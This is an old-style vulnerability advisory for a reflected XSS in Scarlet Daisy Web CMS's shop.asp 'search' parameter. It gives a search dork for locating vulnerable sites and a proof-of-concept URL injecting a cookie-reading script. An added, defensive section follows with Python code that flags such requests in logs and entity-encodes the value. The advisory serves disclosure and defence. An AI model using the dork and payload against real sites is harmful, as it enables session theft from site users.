Scarlet Daisy Web CMS <= Reflected XSS Vulnerability
~~~~~~~~~~~~~~~[My]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
[+] Author : KnocKout
[~] Contact : knockout@e-mail.com.tr
[~] HomePage : http://h4x0resec.blogspot.com
[~] Greetz: DaiMon, PRoMaX, _UnDeRTaKeR_ , BackDoor
Septemb0x , BARCOD3 , ZoRLu, ( milw00rm.com )
~~~~~~~~~~~~~~~~[Software info]~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|~App. : Scarlet Daisy Web Content Management System.
|~Software: http://www.scarletdaisy.com
|~Vulnerability Style : Cross Site Scripting
|[~]Date : "09.12.2014"
|[~]Tested on : Kali Linux
|[Keywords/DORK]: "Powered by Scarlet Daisy Web Content Management System."
~~~~~~~~~~~~~~~~[~]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
| Tested on
==============[INFO]======================================
The 'search' parameter of shop.asp is not safe.
Harmful characters in it should be filtered.
==============[Exploitation]==============================
HTTP://[VICTIM]/shop.asp?action=form&search=
POST: [Cross Site Scripting]
HTTP://[VICTIM]/shop.asp?search=
POST: [Cross Site Scripting]
HTTP://[VICTIM]/shop.asp?action=form&search=<b>HI WORLD</b>"><script>alert(document.cookie)</script>
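==============[Added example: detection and encoding]=====
The following is an added example, not part of the original advisory or of the CMS code. It flags shop.asp requests whose 'search' value carries HTML metacharacters and shows the entity-encoded form the page should emit instead. The combined access-log format, the function names and the sample entries are assumptions constructed for illustration.

```python
import html
import re
from urllib.parse import parse_qsl, urlsplit

# Characters that let a reflected value break out of an attribute or text node.
HTML_META = re.compile(r"[<>\"']")
# Request target inside a combined-format access log entry (assumed log format).
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')


def suspicious_search(log_line):
    """Return the decoded 'search' value of a shop.asp request if it carries
    HTML metacharacters, otherwise None."""
    match = REQUEST.search(log_line)
    if not match:
        return None
    url = urlsplit(match.group(1))
    if not url.path.lower().endswith("/shop.asp"):
        return None
    # parse_qsl percent-decodes; ASP treats parameter names case-insensitively.
    for name, value in parse_qsl(url.query, keep_blank_values=True):
        if name.lower() == "search" and HTML_META.search(value):
            return value
    return None


def encode_for_html(value):
    """Entity-encode a value before it is written back into the page."""
    return html.escape(value, quote=True)


# Constructed sample entries (documentation IP range, not real traffic).
SAMPLE_LOG = [
    '203.0.113.7 - - [09/Dec/2014:10:01:02 +0000] "GET /shop.asp?search=candle+wicks HTTP/1.1" 200 5120',
    '203.0.113.9 - - [09/Dec/2014:10:03:44 +0000] "GET /shop.asp?action=form&search='
    '%3Cb%3EHI%20WORLD%3C/b%3E%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E'
    ' HTTP/1.1" 200 5342',
    '203.0.113.9 - - [09/Dec/2014:10:04:10 +0000] "GET /about.asp?search=%3Cb%3E HTTP/1.1" 200 880',
]

if __name__ == "__main__":
    for entry in SAMPLE_LOG:
        hit = suspicious_search(entry)
        if hit is not None:
            print("flagged:", hit)
            print("encoded:", encode_for_html(hit))
```

In the ASP page itself, the equivalent of encode_for_html is passing the value through Server.HTMLEncode before writing it to the response.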